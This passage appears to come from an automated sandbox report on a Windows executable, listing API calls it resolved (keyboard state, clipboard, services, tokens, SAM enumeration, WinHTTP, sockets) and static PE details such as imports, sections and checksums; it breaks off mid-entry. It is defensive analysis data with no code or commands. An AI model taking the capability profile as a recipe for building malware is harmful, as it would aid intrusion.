- "kernel32.dll.CreateThread",
- "kernel32.dll.ConvertFiberToThread",
- "kernel32.dll.FreeEnvironmentStringsA",
- "kernel32.dll.GetBinaryTypeA",
- "kernel32.dll.VirtualQueryEx",
- "kernel32.dll.LocalSize",
- "kernel32.dll.LocalReAlloc",
- "kernel32.dll.GlobalMemoryStatus",
- "kernel32.dll.GlobalUnlock",
- "kernel32.dll.GlobalSize",
- "kernel32.dll.GlobalReAlloc",
- "kernel32.dll.GetVersion",
- "kernel32.dll.RtlCaptureContext",
- "kernel32.dll.DebugActiveProcessStop",
- "kernel32.dll.WaitForDebugEvent",
- "kernel32.dll.GetLocaleInfoW",
- "kernel32.dll.WaitForSingleObjectEx",
- "kernel32.dll.FreeLibraryAndExitThread",
- "kernel32.dll.EnumSystemLocalesW",
- "kernel32.dll.ReadConsoleW",
- "kernel32.dll.SetEnvironmentVariableA",
- "kernel32.dll.CopyFileExA",
- "kernel32.dll.GetSystemInfo",
- "user32.dll.GetThreadDesktop",
- "user32.dll.SendMessageW",
- "user32.dll.GetIconInfo",
- "user32.dll.GetClipboardOwner",
- "user32.dll.SetClipboardViewer",
- "user32.dll.EqualRect",
- "user32.dll.GetWindowRect",
- "user32.dll.GetWindowLongW",
- "user32.dll.OpenDesktopW",
- "user32.dll.FindWindowW",
- "user32.dll.PostMessageW",
- "user32.dll.GetDC",
- "user32.dll.IntersectRect",
- "user32.dll.EnumWindows",
- "user32.dll.IsWindowVisible",
- "user32.dll.SetTimer",
- "user32.dll.PostThreadMessageW",
- "user32.dll.SetWinEventHook",
- "user32.dll.SystemParametersInfoW",
- "user32.dll.WinHelpW",
- "user32.dll.TranslateMDISysAccel",
- "user32.dll.DefFrameProcW",
- "user32.dll.IsDialogMessageW",
- "user32.dll.LoadStringW",
- "user32.dll.LoadStringA",
- "user32.dll.DestroyIcon",
- "user32.dll.LoadIconA",
- "user32.dll.DestroyCursor",
- "user32.dll.GetWindowThreadProcessId",
- "user32.dll.FindWindowA",
- "user32.dll.IsRectEmpty",
- "user32.dll.InflateRect",
- "user32.dll.GetSysColorBrush",
- "user32.dll.HideCaret",
- "user32.dll.GetCaretBlinkTime",
- "user32.dll.SetCursor",
- "user32.dll.SetWindowTextA",
- "user32.dll.GetScrollPos",
- "user32.dll.SetScrollPos",
- "user32.dll.GetUserObjectInformationW",
- "user32.dll.EndPaint",
- "user32.dll.CloseDesktop",
- "user32.dll.SetActiveWindow",
- "user32.dll.UpdateWindow",
- "user32.dll.DrawTextW",
- "user32.dll.DrawTextA",
- "user32.dll.GetSubMenu",
- "user32.dll.EnableMenuItem",
- "user32.dll.DestroyMenu",
- "user32.dll.GetSystemMenu",
- "user32.dll.GetMenuState",
- "user32.dll.SetMenu",
- "user32.dll.LoadMenuIndirectW",
- "user32.dll.TranslateAcceleratorA",
- "user32.dll.IsWindowEnabled",
- "user32.dll.EnableWindow",
- "user32.dll.MsgWaitForMultipleObjects",
- "user32.dll.SetFocus",
- "user32.dll.IsCharUpperW",
- "user32.dll.CharNextA",
- "user32.dll.CharUpperW",
- "user32.dll.CharUpperA",
- "user32.dll.IsDlgButtonChecked",
- "user32.dll.GetDlgItemTextW",
- "user32.dll.GetDlgItemTextA",
- "user32.dll.GetDlgItem",
- "user32.dll.DialogBoxParamW",
- "user32.dll.CreateDialogParamW",
- "user32.dll.CreateDialogParamA",
- "user32.dll.IsZoomed",
- "user32.dll.AnyPopup",
- "user32.dll.BeginDeferWindowPos",
- "user32.dll.IsWindow",
- "user32.dll.InSendMessage",
- "user32.dll.CallWindowProcW",
- "user32.dll.DefWindowProcW",
- "user32.dll.DefWindowProcA",
- "user32.dll.AttachThreadInput",
- "user32.dll.SendMessageA",
- "user32.dll.PeekMessageW",
- "user32.dll.PeekMessageA",
- "user32.dll.GetMessageA",
- "user32.dll.SetWindowLongW",
- "user32.dll.PostQuitMessage",
- "user32.dll.GetCursorPos",
- "user32.dll.VkKeyScanExW",
- "user32.dll.MapVirtualKeyW",
- "user32.dll.GetAsyncKeyState",
- "user32.dll.OpenClipboard",
- "user32.dll.DispatchMessageW",
- "user32.dll.GetCursorInfo",
- "user32.dll.ChangeClipboardChain",
- "user32.dll.CloseClipboard",
- "user32.dll.EmptyClipboard",
- "user32.dll.OpenInputDesktop",
- "user32.dll.ReleaseDC",
- "user32.dll.SetClipboardData",
- "user32.dll.LoadKeyboardLayoutW",
- "user32.dll.SendMessageTimeoutW",
- "user32.dll.keybd_event",
- "user32.dll.GetSystemMetrics",
- "user32.dll.SetThreadDesktop",
- "user32.dll.GetKeyboardState",
- "user32.dll.ExitWindowsEx",
- "user32.dll.mouse_event",
- "user32.dll.MessageBoxA",
- "user32.dll.DestroyWindow",
- "user32.dll.CreateWindowExW",
- "user32.dll.RegisterClassExW",
- "user32.dll.ScrollDC",
- "user32.dll.GetMessageW",
- "gdi32.dll.GdiFlush",
- "gdi32.dll.SelectObject",
- "gdi32.dll.CreateCompatibleBitmap",
- "gdi32.dll.BitBlt",
- "gdi32.dll.CreateDIBSection",
- "gdi32.dll.CreateCompatibleDC",
- "gdi32.dll.RealizePalette",
- "gdi32.dll.GetDIBits",
- "gdi32.dll.GetDeviceCaps",
- "gdi32.dll.GetSystemPaletteEntries",
- "gdi32.dll.DeleteDC",
- "gdi32.dll.CreatePalette",
- "gdi32.dll.CreateRectRgnIndirect",
- "gdi32.dll.GetRegionData",
- "gdi32.dll.CombineRgn",
- "gdi32.dll.GetBitmapBits",
- "gdi32.dll.GetObjectW",
- "gdi32.dll.DeleteObject",
- "gdi32.dll.LPtoDP",
- "gdi32.dll.ExtTextOutA",
- "gdi32.dll.SetAbortProc",
- "gdi32.dll.StartPage",
- "gdi32.dll.StartDocW",
- "gdi32.dll.UpdateColors",
- "gdi32.dll.StretchBlt",
- "gdi32.dll.SelectPalette",
- "gdi32.dll.GetPaletteEntries",
- "gdi32.dll.GetMetaFileW",
- "gdi32.dll.Escape",
- "gdi32.dll.EqualRgn",
- "gdi32.dll.Ellipse",
- "gdi32.dll.CreateRectRgn",
- "gdi32.dll.CreateFontIndirectA",
- "comdlg32.dll.GetSaveFileNameW",
- "comdlg32.dll.GetSaveFileNameA",
- "comdlg32.dll.GetOpenFileNameW",
- "comdlg32.dll.ReplaceTextW",
- "comdlg32.dll.FindTextW",
- "comdlg32.dll.FindTextA",
- "comdlg32.dll.GetFileTitleW",
- "advapi32.dll.RegCreateKeyExA",
- "advapi32.dll.DeleteService",
- "advapi32.dll.ControlService",
- "advapi32.dll.StartServiceW",
- "advapi32.dll.EnumServicesStatusExW",
- "advapi32.dll.QueryServiceConfigW",
- "advapi32.dll.OpenServiceW",
- "advapi32.dll.ConvertSidToStringSidW",
- "advapi32.dll.GetTokenInformation",
- "advapi32.dll.RegisterServiceCtrlHandlerExW",
- "advapi32.dll.SetTokenInformation",
- "advapi32.dll.SetServiceStatus",
- "advapi32.dll.CreateProcessAsUserW",
- "advapi32.dll.StartServiceCtrlDispatcherW",
- "advapi32.dll.DuplicateTokenEx",
- "advapi32.dll.RegSetValueExA",
- "advapi32.dll.RegQueryValueExA",
- "advapi32.dll.OpenSCManagerA",
- "advapi32.dll.RegRestoreKeyW",
- "advapi32.dll.RegOpenKeyExA",
- "advapi32.dll.RegOpenKeyA",
- "advapi32.dll.RegNotifyChangeKeyValue",
- "advapi32.dll.RegDeleteValueW",
- "advapi32.dll.RegCreateKeyA",
- "advapi32.dll.OpenProcessToken",
- "advapi32.dll.CloseServiceHandle",
- "advapi32.dll.QueryServiceStatus",
- "advapi32.dll.CreateServiceW",
- "advapi32.dll.InitiateSystemShutdownExW",
- "advapi32.dll.AdjustTokenPrivileges",
- "advapi32.dll.LookupPrivilegeValueW",
- "advapi32.dll.AccessCheck",
- "advapi32.dll.SetSecurityDescriptorOwner",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.GetSidSubAuthority",
- "advapi32.dll.IsValidSecurityDescriptor",
- "advapi32.dll.FreeSid",
- "advapi32.dll.InitializeAcl",
- "advapi32.dll.DuplicateToken",
- "advapi32.dll.GetLengthSid",
- "advapi32.dll.AddAccessAllowedAce",
- "advapi32.dll.SetSecurityDescriptorGroup",
- "advapi32.dll.RegDeleteKeyA",
- "advapi32.dll.OpenSCManagerW",
- "advapi32.dll.RegCreateKeyExW",
- "advapi32.dll.RegEnumKeyExW",
- "advapi32.dll.ImpersonateLoggedOnUser",
- "advapi32.dll.RevertToSelf",
- "advapi32.dll.RegQueryValueExW",
- "shell32.dll.SHGetSpecialFolderPathW",
- "shell32.dll.ShellExecuteW",
- "shell32.dll.ShellAboutW",
- "kernel32.dll.FlsFree",
- "kernel32.dll.InitOnceExecuteOnce",
- "kernel32.dll.CreateEventExW",
- "kernel32.dll.CreateSemaphoreExW",
- "kernel32.dll.CreateThreadpoolTimer",
- "kernel32.dll.SetThreadpoolTimer",
- "kernel32.dll.WaitForThreadpoolTimerCallbacks",
- "kernel32.dll.CloseThreadpoolTimer",
- "kernel32.dll.CreateThreadpoolWait",
- "kernel32.dll.SetThreadpoolWait",
- "kernel32.dll.CloseThreadpoolWait",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.FreeLibraryWhenCallbackReturns",
- "kernel32.dll.GetCurrentProcessorNumber",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.GetTickCount64",
- "kernel32.dll.GetFileInformationByHandleEx",
- "kernel32.dll.SetFileInformationByHandle",
- "kernel32.dll.InitializeConditionVariable",
- "kernel32.dll.WakeConditionVariable",
- "kernel32.dll.WakeAllConditionVariable",
- "kernel32.dll.SleepConditionVariableCS",
- "kernel32.dll.TryAcquireSRWLockExclusive",
- "kernel32.dll.SleepConditionVariableSRW",
- "kernel32.dll.CreateThreadpoolWork",
- "kernel32.dll.SubmitThreadpoolWork",
- "kernel32.dll.CloseThreadpoolWork",
- "kernel32.dll.CompareStringEx",
- "kernel32.dll.GetLocaleInfoEx",
- "api-ms-win-core-synch-l1-2-0.dll.InitializeConditionVariable",
- "api-ms-win-core-synch-l1-2-0.dll.SleepConditionVariableCS",
- "api-ms-win-core-synch-l1-2-0.dll.WakeAllConditionVariable",
- "kernel32.dll.WTSGetActiveConsoleSessionId",
- "ntdll.dll.RtlGetVersion",
- "dwmapi.dll.DwmIsCompositionEnabled",
- "kbdus.dll.#1",
- "kernel32.dll.GetNativeSystemInfo",
- "sechost.dll.LookupAccountNameLocalW",
- "advapi32.dll.LookupAccountSidW",
- "sechost.dll.LookupAccountSidLocalW",
- "kernel32.dll.GetThreadPreferredUILanguages",
- "kernel32.dll.SetThreadPreferredUILanguages",
- "kernel32.dll.LocaleNameToLCID",
- "kernel32.dll.LCIDToLocaleName",
- "kernel32.dll.GetSystemDefaultLocaleName",
- "oleaut32.dll.#283",
- "oleaut32.dll.#284",
- "kernel32.dll.RegOpenKeyExW",
- "ntdll.dll.EtwUnregisterTraceGuids",
- "sechost.dll.QueryServiceConfigW",
- "winsta.dll.WinStationRegisterNotificationEvent",
- "advapi32.dll.CreateWellKnownSid",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.RpcStringFreeW",
- "rpcrt4.dll.RpcBindingSetAuthInfoExW",
- "rpcrt4.dll.RpcAsyncInitializeHandle",
- "rpcrt4.dll.NdrClientCall2",
- "rpcrt4.dll.NdrAsyncClientCall",
- "winsta.dll.WinStationIsSessionRemoteable",
- "wtsapi32.dll.WTSQuerySessionInformationW",
- "winsta.dll.WinStationQueryInformationW",
- "rpcrt4.dll.I_RpcExceptionFilter",
- "wtsapi32.dll.WTSFreeMemory",
- "wmisvc.dll.ServiceMain",
- "sechost.dll.RegisterServiceCtrlHandlerExW",
- "sechost.dll.SetServiceStatus",
- "cryptsp.dll.CryptAcquireContextW",
- "cryptsp.dll.CryptGenRandom",
- "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
- "advapi32.dll.RegisterEventSourceW",
- "advapi32.dll.ReportEventW",
- "advapi32.dll.DeregisterEventSource",
- "advapi32.dll.WmiOpenBlock",
- "ole32.dll.CoGetClassObject",
- "ole32.dll.CoGetMarshalSizeMax",
- "ole32.dll.CoMarshalInterface",
- "ole32.dll.CoUnmarshalInterface",
- "ole32.dll.StringFromIID",
- "ole32.dll.CoGetPSClsid",
- "ole32.dll.CoReleaseMarshalData",
- "ole32.dll.DcomChannelSetHResult",
- "vssapi.dll.CreateWriter",
- "advapi32.dll.LookupAccountNameW",
- "samcli.dll.NetLocalGroupGetMembers",
- "samlib.dll.SamConnect",
- "rpcrt4.dll.NdrClientCall3",
- "samlib.dll.SamOpenDomain",
- "samlib.dll.SamLookupNamesInDomain",
- "samlib.dll.SamOpenAlias",
- "samlib.dll.SamFreeMemory",
- "samlib.dll.SamCloseHandle",
- "samlib.dll.SamGetMembersInAlias",
- "samlib.dll.SamEnumerateDomainsInSamServer",
- "samlib.dll.SamLookupDomainInSamServer",
- "ole32.dll.StringFromCLSID",
- "oleaut32.dll.#4",
- "oleaut32.dll.#7",
- "propsys.dll.VariantToPropVariant",
- "wbemcore.dll.Reinitialize",
- "wbemsvc.dll.DllGetClassObject",
- "wbemsvc.dll.DllCanUnloadNow",
- "authz.dll.AuthzInitializeContextFromToken",
- "authz.dll.AuthzInitializeObjectAccessAuditEvent2",
- "authz.dll.AuthzAccessCheck",
- "authz.dll.AuthzFreeAuditEvent",
- "authz.dll.AuthzFreeContext",
- "authz.dll.AuthzInitializeResourceManager",
- "authz.dll.AuthzFreeResourceManager",
- "rpcrt4.dll.RpcBindingCreateW",
- "rpcrt4.dll.RpcBindingBind",
- "rpcrt4.dll.I_RpcMapWin32Status",
- "advapi32.dll.EventRegister",
- "advapi32.dll.EventUnregister",
- "advapi32.dll.EventWrite",
- "kernel32.dll.RegCloseKey",
- "kernel32.dll.RegSetValueExW",
- "kernel32.dll.RegQueryValueExW",
- "wmisvc.dll.IsImproperShutdownDetected",
- "wevtapi.dll.EvtRender",
- "wevtapi.dll.EvtNext",
- "wevtapi.dll.EvtClose",
- "wevtapi.dll.EvtQuery",
- "wevtapi.dll.EvtCreateRenderContext",
- "rpcrt4.dll.RpcBindingSetOption",
- "ole32.dll.CoCreateFreeThreadedMarshaler",
- "ole32.dll.CreateStreamOnHGlobal",
- "cryptsp.dll.CryptReleaseContext",
- "kernelbase.dll.InitializeAcl",
- "kernelbase.dll.AddAce",
- "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
- "kernel32.dll.IsThreadAFiber",
- "kernel32.dll.OpenProcessToken",
- "kernelbase.dll.GetTokenInformation",
- "kernelbase.dll.DuplicateTokenEx",
- "kernelbase.dll.AdjustTokenPrivileges",
- "kernel32.dll.SetThreadToken",
- "kernelbase.dll.CheckTokenMembership",
- "ole32.dll.CLSIDFromString",
- "kernelbase.dll.AllocateAndInitializeSid",
- "oleaut32.dll.#285",
- "oleaut32.dll.#286",
- "oleaut32.dll.#17",
- "oleaut32.dll.#20",
- "oleaut32.dll.#19",
- "oleaut32.dll.#25",
- "authz.dll.AuthzInitializeContextFromSid",
- "ole32.dll.CoGetCallContext",
- "ole32.dll.CoImpersonateClient",
- "ole32.dll.CoRevertToSelf",
- "ole32.dll.CoSwitchCallContext",
- "lpk.dll.LpkEditControl",
- "comctl32.dll.InitCommonControlsEx",
- "kernel32.dll.HeapSetInformation",
- "advapi32.dll.CheckTokenMembership",
- "kernel32.dll.GetSystemWindowsDirectoryW",
- "kernel32.dll.CreateWaitableTimerW",
- "kernel32.dll.SetWaitableTimer",
- "ole32.dll.CLSIDFromOle1Class",
- "clbcatq.dll.GetCatalogObject",
- "clbcatq.dll.GetCatalogObject2",
- "ole32.dll.NdrOleInitializeExtension",
- "msi.dll.QueryInstanceCount",
- "msi.dll.DllGetClassObject",
- "msi.dll.DllCanUnloadNow",
- "rpcrt4.dll.I_RpcBindingInqLocalClientPID",
- "ntdll.dll.WinSqmIsOptedIn",
- "netapi32.dll.NetGetJoinInformation",
- "netapi32.dll.NetApiBufferFree",
- "shlwapi.dll.UrlIsW",
- "ole32.dll.StgOpenStorage",
- "kernel32.dll.GetFileAttributesExW",
- "advapi32.dll.SaferCreateLevel",
- "advapi32.dll.SaferCloseLevel",
- "apphelp.dll.SdbInitDatabase",
- "apphelp.dll.SdbFindFirstMsiPackage_Str",
- "apphelp.dll.SdbReleaseDatabase",
- "version.dll.GetFileVersionInfoSizeW",
- "version.dll.GetFileVersionInfoW",
- "version.dll.VerQueryValueW",
- "mscoree.dll.GetCORSystemDirectory",
- "advapi32.dll.RegQueryInfoKeyW",
- "advapi32.dll.RegEnumValueW",
- "kernel32.dll.SetThreadExecutionState",
- "sfc.dll.SfcIsKeyProtected",
- "goopdate.dll.DllEntry",
- "kernel32.dll.RtlCaptureStackBackTrace",
- "wkscli.dll.NetWkstaGetInfo",
- "kernel32.dll.CreateMutexExW",
- "rpcrt4.dll.UuidCreate",
- "psmachine.dll.DllGetClassObject",
- "psmachine.dll.DllCanUnloadNow",
- "winhttp.dll.WinHttpAddRequestHeaders",
- "winhttp.dll.WinHttpCheckPlatform",
- "winhttp.dll.WinHttpCloseHandle",
- "winhttp.dll.WinHttpConnect",
- "winhttp.dll.WinHttpCrackUrl",
- "winhttp.dll.WinHttpCreateUrl",
- "winhttp.dll.WinHttpDetectAutoProxyConfigUrl",
- "winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser",
- "winhttp.dll.WinHttpGetDefaultProxyConfiguration",
- "winhttp.dll.WinHttpGetProxyForUrl",
- "winhttp.dll.WinHttpOpen",
- "winhttp.dll.WinHttpOpenRequest",
- "winhttp.dll.WinHttpQueryAuthSchemes",
- "winhttp.dll.WinHttpQueryDataAvailable",
- "winhttp.dll.WinHttpQueryHeaders",
- "winhttp.dll.WinHttpQueryOption",
- "winhttp.dll.WinHttpReadData",
- "winhttp.dll.WinHttpReceiveResponse",
- "winhttp.dll.WinHttpSendRequest",
- "winhttp.dll.WinHttpSetDefaultProxyConfiguration",
- "winhttp.dll.WinHttpSetCredentials",
- "winhttp.dll.WinHttpSetOption",
- "winhttp.dll.WinHttpSetStatusCallback",
- "winhttp.dll.WinHttpSetTimeouts",
- "winhttp.dll.WinHttpWriteData",
- "shlwapi.dll.StrCmpNW",
- "shlwapi.dll.#153",
- "ws2_32.dll.GetAddrInfoW",
- "ws2_32.dll.WSASocketW",
- "ws2_32.dll.#2",
- "ws2_32.dll.FreeAddrInfoW",
- "ws2_32.dll.#6",
- "ws2_32.dll.#5",
- "schannel.dll.SpUserModeInitialize",
- "ws2_32.dll.WSASend",
- "ws2_32.dll.WSARecv",
- "ncrypt.dll.SslOpenProvider",
- "ncrypt.dll.GetSChannelInterface",
- "bcryptprimitives.dll.GetHashInterface",
- "ncrypt.dll.SslIncrementProviderReferenceCount",
- "ncrypt.dll.SslImportKey",
- "bcryptprimitives.dll.GetCipherInterface",
- "ncrypt.dll.SslLookupCipherSuiteInfo",
- "ncrypt.dll.BCryptOpenAlgorithmProvider",
- "ncrypt.dll.BCryptGetProperty",
- "ncrypt.dll.BCryptCreateHash",
- "ncrypt.dll.BCryptHashData",
- "ncrypt.dll.BCryptFinishHash",
- "ncrypt.dll.BCryptDestroyHash",
- "crypt32.dll.CertGetCertificateChain",
- "userenv.dll.GetUserProfileDirectoryW",
- "sechost.dll.ConvertStringSidToSidW",
- "userenv.dll.RegisterGPNotification",
- "gpapi.dll.RegisterGPNotificationInternal",
- "cryptsp.dll.CryptAcquireContextA",
- "cryptsp.dll.CryptCreateHash",
- "cryptsp.dll.CryptHashData",
- "cryptsp.dll.CryptVerifySignatureA",
- "cryptsp.dll.CryptDestroyKey",
- "cryptsp.dll.CryptDestroyHash",
- "bcryptprimitives.dll.GetAsymmetricEncryptionInterface",
- "ncrypt.dll.BCryptImportKeyPair",
- "ncrypt.dll.BCryptVerifySignature",
- "ncrypt.dll.BCryptDestroyKey",
- "crypt32.dll.CertVerifyCertificateChainPolicy",
- "crypt32.dll.CertFreeCertificateChain",
- "crypt32.dll.CertDuplicateCertificateContext",
- "ncrypt.dll.SslEncryptPacket",
- "ncrypt.dll.SslDecryptPacket",
- "winsta.dll.WinStationEnumerateW",
- "winsta.dll.WinStationFreeMemory",
- "qmgr.dll.ServiceMain",
- "bitsigd.dll.InitializeEx",
- "upnp.dll.DllGetClassObject",
- "upnp.dll.DllCanUnloadNow",
- "rpcrt4.dll.RpcStringBindingComposeA",
- "rpcrt4.dll.RpcBindingFromStringBindingA",
- "rpcrt4.dll.RpcStringFreeA",
- "oleaut32.dll.DllGetClassObject",
- "oleaut32.dll.DllCanUnloadNow",
- "sxs.dll.SxsOleAut32MapIIDToProxyStubCLSID",
- "advapi32.dll.RegQueryValueW",
- "oleaut32.dll.BSTR_UserSize",
- "oleaut32.dll.BSTR_UserMarshal",
- "oleaut32.dll.BSTR_UserUnmarshal",
- "oleaut32.dll.BSTR_UserFree",
- "oleaut32.dll.VARIANT_UserSize",
- "oleaut32.dll.VARIANT_UserMarshal",
- "oleaut32.dll.VARIANT_UserUnmarshal",
- "oleaut32.dll.VARIANT_UserFree",
- "oleaut32.dll.LPSAFEARRAY_UserSize",
- "oleaut32.dll.LPSAFEARRAY_UserMarshal",
- "oleaut32.dll.LPSAFEARRAY_UserUnmarshal",
- "oleaut32.dll.LPSAFEARRAY_UserFree",
- "advapi32.dll.LogonUserW",
- "sspicli.dll.LogonUserExExW",
- "wtsapi32.dll.WTSQueryUserToken",
- "advapi32.dll.QueryAllTracesW",
- "ole32.dll.CoRegisterClassObject",
- "iphlpapi.dll.GetAdaptersAddresses",
- "rpcrt4.dll.UuidFromStringW",
- "radarrs.dll.WdiDiagnosticModuleMain",
- "radarrs.dll.WdiHandleInstance",
- "radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "GetCurrentThread",
- "address": "0x40a014"
- },
- {
- "name": "GetOEMCP",
- "address": "0x40a018"
- },
- {
- "name": "GetTickCount",
- "address": "0x40a01c"
- },
- {
- "name": "GetProcAddress",
- "address": "0x40a020"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x40a024"
- },
- {
- "name": "GetLastError",
- "address": "0x40a028"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x40a02c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x40a030"
- },
- {
- "name": "InterlockedIncrement",
- "address": "0x40a034"
- },
- {
- "name": "lstrlenA",
- "address": "0x40a038"
- },
- {
- "name": "GetVersionExA",
- "address": "0x40a03c"
- },
- {
- "name": "GetVersionExW",
- "address": "0x40a040"
- },
- {
- "name": "InterlockedDecrement",
- "address": "0x40a044"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x40a048"
- },
- {
- "name": "VirtualAllocEx",
- "address": "0x40a04c"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x40a050"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x40a054"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x40a058"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "DefWindowProcW",
- "address": "0x40a068"
- },
- {
- "name": "LoadStringW",
- "address": "0x40a06c"
- },
- {
- "name": "SetActiveWindow",
- "address": "0x40a070"
- },
- {
- "name": "ReleaseCapture",
- "address": "0x40a074"
- },
- {
- "name": "CreateWindowExA",
- "address": "0x40a078"
- },
- {
- "name": "GetMenuStringW",
- "address": "0x40a07c"
- },
- {
- "name": "UnregisterClassA",
- "address": "0x40a080"
- },
- {
- "name": "DestroyWindow",
- "address": "0x40a084"
- },
- {
- "name": "RegisterClassW",
- "address": "0x40a088"
- },
- {
- "name": "SendMessageW",
- "address": "0x40a08c"
- },
- {
- "name": "CreateWindowExW",
- "address": "0x40a090"
- },
- {
- "name": "SetWindowLongW",
- "address": "0x40a094"
- },
- {
- "name": "LoadIconA",
- "address": "0x40a098"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "RegOpenKeyExW",
- "address": "0x40a000"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x40a004"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_Add",
- "address": "0x40a00c"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "SetupDecompressOrCopyFileA",
- "address": "0x40a060"
- }
- ],
- "dll": "SETUPAPI.dll"
- },
- {
- "imports": [
- {
- "name": "_exit",
- "address": "0x40a0a0"
- },
- {
- "name": "_c_exit",
- "address": "0x40a0a4"
- },
- {
- "name": "_cexit",
- "address": "0x40a0a8"
- },
- {
- "name": "exit",
- "address": "0x40a0ac"
- },
- {
- "name": "_wcmdln",
- "address": "0x40a0b0"
- },
- {
- "name": "__wgetmainargs",
- "address": "0x40a0b4"
- },
- {
- "name": "_initterm",
- "address": "0x40a0b8"
- },
- {
- "name": "__setusermatherr",
- "address": "0x40a0bc"
- },
- {
- "name": "_adjust_fdiv",
- "address": "0x40a0c0"
- },
- {
- "name": "__p__commode",
- "address": "0x40a0c4"
- },
- {
- "name": "__p__fmode",
- "address": "0x40a0c8"
- },
- {
- "name": "__set_app_type",
- "address": "0x40a0cc"
- },
- {
- "name": "_controlfp",
- "address": "0x40a0d0"
- },
- {
- "name": "__dllonexit",
- "address": "0x40a0d4"
- },
- {
- "name": "_onexit",
- "address": "0x40a0d8"
- },
- {
- "name": "_except_handler3",
- "address": "0x40a0dc"
- },
- {
- "name": "_XcptFilter",
- "address": "0x40a0e0"
- }
- ],
- "dll": "msvcrt.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0002d30a",
- "overlay": {
- "size": "0x00001f00",
- "offset": "0x00025000"
- },
- "imagebase": "0x00400000",
- "reported_checksum": "0x0002d30a",
- "icon_hash": null,
- "entrypoint": "0x004083d6",
- "timestamp": "2019-06-12 20:02:55",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00008000",
- "entropy": "5.82",
- "raw_address": "0x00001000",
- "virtual_size": "0x000076b6",
- "characteristics_raw": "0xf0000020"
- },
- {
- "name": ".bss",
- "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00009000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x00000000",
- "virtual_size": "0x00000030",
- "characteristics_raw": "0xc0000080"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0000a000",
- "size_of_data": "0x00001000",
- "entropy": "2.39",
- "raw_address": "0x00009000",
- "virtual_size": "0x0000061c",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0000b000",
- "size_of_data": "0x0001a000",
- "entropy": "6.12",
- "raw_address": "0x0000a000",
- "virtual_size": "0x00019d54",
- "characteristics_raw": "0xd0000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00025000",
- "size_of_data": "0x00001000",
- "entropy": "0.68",
- "raw_address": "0x00024000",
- "virtual_size": "0x0000025c",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000a104",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000008c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00025000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00001f00"
- },
- {
- "virtual_address": "0x00025000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000118"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000a000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
